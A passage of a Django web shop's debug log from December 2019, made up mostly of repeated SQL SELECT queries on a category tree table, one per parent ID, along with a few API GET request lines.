"shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:17:14,882 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:17:14,884 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:17:14,888 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:17:14,890 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:17:14,893 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:17:14,895 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:17:14,898 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:17:14] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [16/Dec/2019 07:20:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 07:28:05] "GET / HTTP/1.0" 302 0 [16/Dec/2019 07:33:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 07:34:19,094 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:34:19,101 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:34:19,109 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:34:19,111 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:34:19,115 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:34:19,117 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:34:19,119 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-16 07:34:19,123 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:34:19,125 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:34:19,127 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:34:19,130 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) [16/Dec/2019 07:34:19] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-16 07:34:19,134 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:34:19,137 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:34:19,139 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:34:19,141 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:34:19,144 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:34:19,147 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:34:19,150 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:34:19,152 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:34:19,154 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:34:19,157 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:34:19,160 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:34:19,163 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:34:19,166 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:34:19,169 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:34:19,171 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:34:19,173 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:34:19,176 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:34:19,179 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:34:19,181 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:34:19,183 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:34:19,185 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:34:19,189 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:34:19,191 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:34:19,193 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:34:19,196 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:34:19,198 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:34:19,202 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:34:19,204 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:34:19,206 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:34:19,209 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:34:19,211 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:34:19,213 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:34:19,217 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:34:19,219 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:34:19,221 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:34:19,224 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:34:19,227 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:34:19] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:35:32,316 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:35:32,326 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:35:32,330 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:35:32,332 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:35:32,336 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:35:32,338 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:35:32,345 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:35:32,348 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:35:32,351 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-16 07:35:32,354 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:35:32,358 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:35:32,361 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; 